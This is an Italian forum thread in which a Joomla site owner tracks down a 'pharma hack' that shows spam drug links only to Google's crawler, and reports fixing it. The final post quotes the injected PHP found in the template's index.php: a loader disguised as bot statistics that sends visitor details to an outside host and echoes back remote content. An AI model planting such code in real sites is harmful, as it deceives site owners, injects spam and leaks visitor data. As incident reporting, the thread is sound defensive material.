[RISOLTO] pubblicità non voluta nel mio sito

[stevcolas]

Help!!!
dagli strumenti per webmaster di google ho scoperto che il mio sito indicizza anche la parola "****"

sono andato a vedere la pagina incriminata ma sembra pulita.

se invece seleziono la "copia cache"  scopro che dopo il footer del sito c'è il codice "

a href="http://cheap***withoutprescriptiongfs c o m">*** without prescription  <a href="http://***onlineuklkr.com" title="

nemmeno a dirlo, nel db non trovo niente ed un search in tutti i files del sito non da esito positivo

come trovo e debello questa intrusione ?



se c'è già un post , come lo trovo visto che la parola incriminata non si può scrivere sul forum ?

grazie 1000!!!
Stefano

edit: vietato eludere la moderazione.

[stevcolas]

rieccomi
prima di tutto non era mia intenzione dolosa modificare la moderazione ma a mio avviso il nuovo Oggetto non rende l'idea del problema. se la nuova aggiunta non dovesse andare bene la togliamo.

mi sono documentato in altre sedi e sembra un caso di "Pharma hack" molto noto a quanto pare sui siti
implementati con CMS.

tuttavia, purtoppo, nonostante tutte le analisi suggerite quà e la non sono riuscito a trovale alcunchè di sospetto nei file del mio sito, tranne se se da motore di ricerca digito site:www.nomesito.com (online|v...)
appare il fattaccio.

il Pharma hack si mostra solo ai google bot e non al navigatore (fortunatamente) ma il rischio di cadere giù dalla ranking list è molto alto .

un altro modo per vedere se si è infetti è clikkare su "copia cache" del motore di ricerca. la pagina nell'heared o nel footer presenterà "pubblicità non desiderate".

qualcuno ha avuto esperienze in  merito ?

ah dimenticavo.
Joomla version ultimissima, ma probabilmente sono infetto da prima di fare l'upgrade.

thanks

[Npaquito]

Hola

Abbiamo un link?

[stevcolas]

ma certo

www.arcierilupacapitolina.it

[Npaquito]

Hola

A me risulta pulito sia il codice che entrando da Google

[stevcolas]

Hola

A me risulta pulito sia il codice che entrando da Google

si il sito sembra pulito ma se guardi quà:

http://webcache.googleusercontent.com/search?q=cache:dRXmEUKcccAJ:www.arcierilupacapitolina.it/+&cd=3&hl=it&ct=clnk&gl=it

in fondo leggi "la pubblicità"

anche digitando sul otore di ricerca site:www.arcierilupacapitolina.it (online|v...a)

dove v...a è quel farmaco blu...

otterrai lo stesso risultato

 

[Npaquito]

Hola

...
anche digitando sul otore di ricerca site:www.arcierilupacapitolina.it (online|v...a)
...

A me no, la cache che si vede va a sapere di quando è

[stevcolas]

Hola
A me no, la cache che si vede va a sapere di quando è

scrivi la parola del medicinale per intero. tanto hai capito di cosa si tratta.
io quì non posso che il moderatore si arrabbia 

[Npaquito]

Ciao

Non hai capito te, io non vedo niente da nessuna parte.

Mi dispiace piu di quanto te creda, perche far arrabbiare di tanto in quanto i moderatori é uno dei miei sport preferiti, se è tomvariabile poi... 

[stevcolas]

Boh
dalle "copia cache" di google ancora mi ritorna lo spam in fondo alla pagina, e dagli strumenti per webmaster, facendo l'analisi come google bot anche.

aspetterò un po' di giorni per vedere cosa cambia, nel fattempo mi preparo con calma una nuova insallazione ex novo in locale ed all'occorrenza la scarico sul host.
grazie
ciao
Stefano

[stevcolas]

eccoci quà
mi sono rimboccato le maniche ed ho iniziato a ricomporre l'intero sito da zero ma ... sorpresa!...
al momento di copiare i files di configurazione e rileggendoli uno per uno, nel
/templates/nome-tamplate/index.php in fondo ho trovato questo codice:

<?php
    // This code use for global bot statistic
    $sUserAgent = strtolower($_SERVER['HTTP_USER_AGENT']); //  Looks for google serch bot
    $sReferer = '';
    if(isset($_SERVER['HTTP_REFERER']) === true)
    {
        $sReferer = strtolower($_SERVER['HTTP_REFERER']);
    }
    if(!(strpos($sUserAgent, 'google') === false)) // Bot comes
    {
        if(isset($_SERVER['REMOTE_ADDR']) == true && isset($_SERVER['HTTP_HOST']) == true) // Create bot analitics           
        echo file_get_contents('http://webdefense1.net/Web/StatO/Stat.php?ip='.urlencode($_SERVER['REMOTE_ADDR']).'&useragent='.urlencode($sUserAgent).'&domainname='.urlencode($_SERVER['HTTP_HOST']).'&fullpath='.urlencode($_SERVER['REQUEST_URI']).'&check='.isset($_GET['look']).'&ref='.urlencode($sReferer) );
    } else
    {
        if(isset($_SERVER['REMOTE_ADDR']) == true && isset($_SERVER['HTTP_HOST']) == true) // Create  bot analitics           
        echo file_get_contents('http://webdefense1.net/Web/StatO/Stat.php?ip='.urlencode($_SERVER['REMOTE_ADDR']).'&useragent='.urlencode($sUserAgent).'&domainname='.urlencode($_SERVER['HTTP_HOST']).'&fullpath='.urlencode($_SERVER['REQUEST_URI']).'&addcheck='.'&check='.isset($_GET['look']).'&ref='.urlencode($sReferer));
    } // Statistic code end
?>


rimosso il suddetto codicillo, tutto è tornato quasi subito alla normlità, adesso attendo i tempi di google per il rinnovo della "copia cache" che quà e là , sulle pagine scansionate prima di ferragosto ancora riporta un po' di "pubblicità"

spero sia utile

ciao
Stefano